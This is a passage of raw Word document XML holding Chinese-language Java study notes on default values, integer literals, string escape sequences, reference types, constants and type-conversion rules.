      <w:tr w:rsidR="004C452C" w14:paraId="4D90B3C1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5D0203A5"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char</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3152B905"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'u0000'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0FE80C17" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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434CE322"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String (or any object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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77B25807"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null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="7854A917" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="90"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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54249875"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boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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1AF9B2FF"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false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62E7C9FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713D122D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十进制、十六进制、八进制方式表示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF40AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int decimal = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9148A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int octal = 0144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9BEDCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int hexa = 0x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFEBCD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369F8F79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示引号内的字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224FE91B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"Hello World"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAE639C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"two\nlines"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330375B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"\"This is in quotes\""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8763F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346D4713" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串可以包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4C64DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>char a = '\u0001';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C65EA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>String a = "\u0001";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529395B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="398A1CFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特殊的转义字符序列：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8790" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1898"/>
        <w:gridCol w:w="6892"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="3D427C86" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02871A50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>符号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="140920F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>字符含义</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="622E590B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3AAFF486"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\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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0B449C56"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换行 (0x0a)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="59B1A59E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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271AF7FA"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\r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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50A80AC2"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回车 (0x0d)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="684CBA3E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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0F2B82E1"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\f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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1348BB79"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换页符(0x0c)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="34162E31" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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6291B995"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\b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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0B8979E6"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退格 (0x08)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="59915214" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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51F6EC22"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\0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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08CDC87E"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空字符 (0x0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="1E7C8639" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3706ADF8"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lastRenderedPageBreak/>
              <w:t>\s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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164CE1BB"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空格 (0x20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="678EAE6F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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2A35F088"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\t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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7259513E"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制表符</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="571DB2FB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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67C6BC5A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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4E34B557"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双引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="1405492B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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29682200"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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1AED132C"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单引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="50485558" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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29D4A35B"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5D8B9E64"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反斜杠</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="46324492" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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01FEE3D8"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\ddd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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2A7784E6"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八进制字符 (ddd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="03C808C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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117D7DCB"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\uxxxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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164F85AD"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16进制Unicode字符 (xxxx)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C058659" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AFFC5D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7154D9AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两大数据类型：引用类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F300B07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，引用类型的变量非常类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C/C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的指针。引用类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指向一个对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，指向对象的变量是引用变量。这些变量在声明时被指定为一个特定的类型，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Employee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Puppy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。变量一旦声明后，类型就不能被改变了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51240081" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象、数组都是引用数据类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D344374" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有引用类型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认值都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090CBD3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个引用变量可以用来引用任何与之兼容的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4AFFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Site site = new Site("Runoob")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA06D27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71884EC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明常量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154216EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>final double PI = 3.1415927;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237699FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动类型转换：从低到高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FDECC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整型、实型（常量）、字符型数据可以混合运算。运算中，不同类型的数据先转化为同一类型，然后进行运算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037169C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F3EF2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>转换：从低到高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B832B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>byte,short,char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt; long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; float </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; double </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553B8BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E28292" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换规则：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B8146B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>不能对</w:t>
      </w:r>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:t>类型进行类型转换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF456F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>不能把对象类型转换成不相关类的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B91295" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>在把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>容量大的类型转换为容量小</w:t>
      </w:r>
      <w:r>
        <w:t>的类型时必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>强制类型转换</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A914E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>转换过程中可能导致溢出或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>损失精度</w:t>
      </w:r>
      <w:r>
        <w:t>，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A75397F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
